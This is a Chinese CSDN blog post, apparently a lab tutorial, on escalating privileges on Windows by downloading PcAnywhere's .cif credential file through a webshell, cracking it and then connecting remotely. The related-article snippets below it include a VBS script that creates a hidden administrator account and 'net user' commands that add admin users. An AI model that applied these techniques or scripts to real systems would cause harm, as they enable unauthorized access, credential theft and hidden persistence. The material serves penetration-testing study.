Windows提权实战——————3、PcAnyWhere提权

最新推荐文章于 2024-05-12 05:59:42 发布
最新推荐文章于 2024-05-12 05:59:42 发布
阅读量2.6k 收藏 4
点赞数 1
分类专栏: 【渗透测试高级篇】 # 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80377199
版权

PCAnyWhere简介

PcAnyWhere是一款远程控制软件,它出现的目的是为了方便网管人员管理服务器。安装之后默认监听5631端口。它可以将电脑当成主控端去控制远方的另外一台同样安装有PcAnyWhere的电脑(被控端),实现互传文件,内建FIPS 140-2验证AES 256位元加密,可以确保阶段作业的安全性。

提权原理

PcAnyWhere提权的原理是PcAnyWhere在建立被控端后,会在服务器上产生一个配置文件“pca.***.cif”,这个文件所在的目录并非在安装目录中,而是在“C:\Document and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts”中。

在配置文件中保存着加密后的链接账户信息,当攻击者下载到这个文件之后,就可以对这个文件进行解密,之后即可获得用户名与密码,之后再使用本地的PcAnyWhere进行登录链接即可获得远程控制。

提权操作演示

环境部署

首先下载PcAnyWhere到本地,之后分别在靶机(Windows Server 2003 R2)、攻击主机Windows XP 中进行安装,之后再Windows Server 2003 R2中建立被控制端程序,设置用户名:hps  密码:*************,之后我们可以发现在“C:\Document and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts”中

存在一个用于记录该用户的文件:


我们最终的目的就是通过在Windows Server 2003 R2上的WEBshell来下载该文件到攻击主机上,之后再进行破解,最后再使用攻击主机上的PcAnyWhere进行连接!下面进行具体操作!

在Windows XP中使用菜刀连接一句话木马


之后进入C:\Document and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts\下,下载文件


之后可以使用明小子、通天门来对该文件进行解密,获得最后的用户名与密码,之后在本地创建PcAnyWhere的控制端进行连接即可!



实现远控,提权!


FLy_鹏程万里
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
windows(一)
qq_40327508的博客
09-24 251
内核漏洞 #查看本地系统补丁 systeminfo |findstr "KB" wmic qfe get Caption,Description,HotFixID,InstalledOn #另外两种远程查询的方式需要结合其他远程执行方式,例如 wmic远程,schtasks远程、dcom远程等等,还有一些笔者不知到远程执行方式。 wmic qfe get Caption,Description,HotFixID,InstalledOn |findstr /C:"KB3143141" 得到补丁号可以使用
PCAnyWhere简体中文版.zip
07-11
PCAnyWhere简体中文版:远程控制的高效解决方案》 在信息技术日益发达的今天,远程控制软件成为了许多用户和企业不可或缺的工具。Symantec公司的PCAnyWhere,以其强大的功能和广泛的应用场景,被誉为远程控制软件...
PcAnywhere 玩家实战(PDG)
03-12
讲述pcAnywhere的功能、安装与使用方法、高级应用技巧等
PcAnyWhere 的默认端口
kinber的专栏
04-27 691
默认端口为5631、5632。 需要开防火墙的,开通这两个端口就行了 
2024年网络安全最新Windows方法简单总结_systminfo ,根据系统补丁,真的太香了
最新发布
2401_84544780的博客
05-12 943
写了好多天的windows与linux技巧,现在做下简单的总结。是后渗透重要的一环节,在限较低的情况下,我们在进行一些操作如读取/写入敏感文件、限维持等会受到束缚,所以需要。在实际中我们会碰到工作组和域环境,工作组环境我们的目的是从普通用户限到管理员或者system限。而域环境中我们通常是从域用户到域管理员限。
pcanywhere
D1stiny的博客
05-08 240
用大马访问pcanywhere默认安装目录,下载用户配置文件 用工具破解密码 这里是你的主机,选择连接另一台计算机到我的电脑 输入之前的账号密码 连接成功
第三方软件 pcanywhere
weixin_30709061的博客
05-20 200
pcanywhere 是一个远程管理软件 1.访问pcanywhere默认安装目录 访问 下载打开 利用破解工具直接 选择刚刚下载的软件 点破解 拿到用户密码后去百度下载客户端让后连接 转载于:https://www.cnblogs.com/feizianquan/p/10891978.html...
PCANYWHERE
weixin_34270865的博客
12-30 143
一台服务器在安装后,往往是处在机房,或者办公室等较为封闭的环境中,那么管理员接触 到服务器也不是很方便的,为了方便的维护,管理,监视服务器的状态,很多服务器上除了 供正常应用服务的程序之外,还装有方便管理员去管理服务器的管理软件。这里我们的 就有了一个新的思路,能否让这些管理软件“为我所用”,让我在远程能够像管理员一样 利用它们来操作...
msf实战windows_学员实战 | 记一次对非法站点测试的反思
weixin_39572409的博客
11-22 1396
hanzo学员某一天突然来问,如何撸这个站【非法而且是境外ip地址】然后慢慢指导了下,搞定!,也不算全部搞完!然后群里某一天讨论到这个v01cano想复现下搞一下,然后v01cano也搞下了,还抓了管理员密码下面是v01cano的渗透记录前声明:此次渗透是先看了一篇文章,并与博主有交流后进行的,我想就这次渗透学习到的东西做个笔记如下。此次渗透为对某个非法网站的渗透【服务器ip地址在美国...
webshell教程.doc
06-26
【Webshell教程】 Webshell是网络安全领域中的一种攻击手段,通过获取Webshell,攻击者尝试进一步升在目标服务器上的限,以达到控制整个系统的终极目标。以下是一些常见的方法: 1. **利用...
pcanywhere125.part3.rar
11-01
PcAnywhere是一款远程控制软件,你可以将你的电脑当成主控端去控制远方另一台同样安装有pcANYWHERE的电脑(被控端),你可以使用被控端电脑上的程序或在主控端与被控端之间互传文件。你也可以使用其闸道功能让多台...
windows入侵-创建隐藏帐号
12-12
windows入侵-创建隐藏帐号 使用vbs的好处是可以通过echo 输入到远程计算机中,然后运行.(具体过程请参照本人相关的文章).      set wsnetwork=CreateObject("WSCRIPT.NETWORK")   os="WinNT://"&wsnetwork.ComputerName   Set ob=GetObject(os)   Set oe=GetObject(os&"/Administrators,group")   Set od=ob.Create("user","xxxx$")   od.SetPassword "yyyy"   od.SetInfo   Set of=GetObject(os&"/xxxx$",user)   oe.add os&"/xxxx$"
PCanywhere的密码文件(cif)解码(c++)
02-23
PCanywhere的密码文件(cif)解码得到远程连接得帐号和密码
pcanywhere
06-03
- **多平台支持**:PCAnywhere不仅支持Windows操作系统,还支持多种其他平台,包括Mac和Unix,实现跨平台的远程连接。 - **安全连接**:软件供强大的加密技术,如AES,确保数据传输的安全性,防止未经授的访问...
Day10——学习之第三方软件FlashFXP及pcAnywhere
0nc3的博客
12-27 302
0x00 FlashFXP 1、FlashFXP简介 FlashFXP是一款功能强大的FXP/FTP软件,集成了其它优秀的FTP软件的优点,如CuteFTP的目录比较,支持彩色文字显示;如BpFTP支持多目录选择文件,暂存目录;又如LeapFTP的界面设计。 2、思路 利用FlashFXP替换文件漏洞,可以读取管理员链接过的站点账号密码。 3、步骤 (1)下载quick.dat这...
Windows与开启远程连接
weixin_34396902的博客
10-21 569
1.: 建立普通用户:net user 帐户 密码 /add 成管理员:net localgroup administrators 帐户 /add 更改用户密码:net user 帐户 密码 删除用户: net user 帐户 /del 2.开启远程连接: windows2000 cmd下开3389 echo Windows Registry E...
远程控制软件Radmin限之实例研究
weixin_34122548的博客
05-04 526
远程控制软件Radmin限之实例研究 Simeon      在网络安全技术比较成熟的今天,一些配置上的疏忽或者管理上的不到位将会导致巨大的安全风险。在笔者的眼中,远程控制软件除了溢出等漏洞外,利用口令等方式来限无疑是一种上佳选择,只要获取了口令信息,配合一些工具软件,就可以使用它来进行“正常”登录,***者行使管理员限,Serv-U、PcAnywhere、VNC都存在过这种问题...
Windows最最最常见的几种方法
2301_80115097的博客
12-12 837
Windows SMB 服务器特升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特升漏洞,成功利用此漏洞的攻击者可以使用升的特执行任意代码。高自己在服务器中的限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞升WEBSHELL限以夺得该服务器限,通常是把普通用户的升到管理员限或者系统限。要利用此漏洞,攻击者首先必须登录到系统。
Windows介绍
weixin_51198941的博客
11-01 234
Mysql、SQL server、启动项、内核Windows、本地、令牌窃取、烂土豆、DLL、计划任务、沙盒、UDF MOF、Redis、Orcle

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值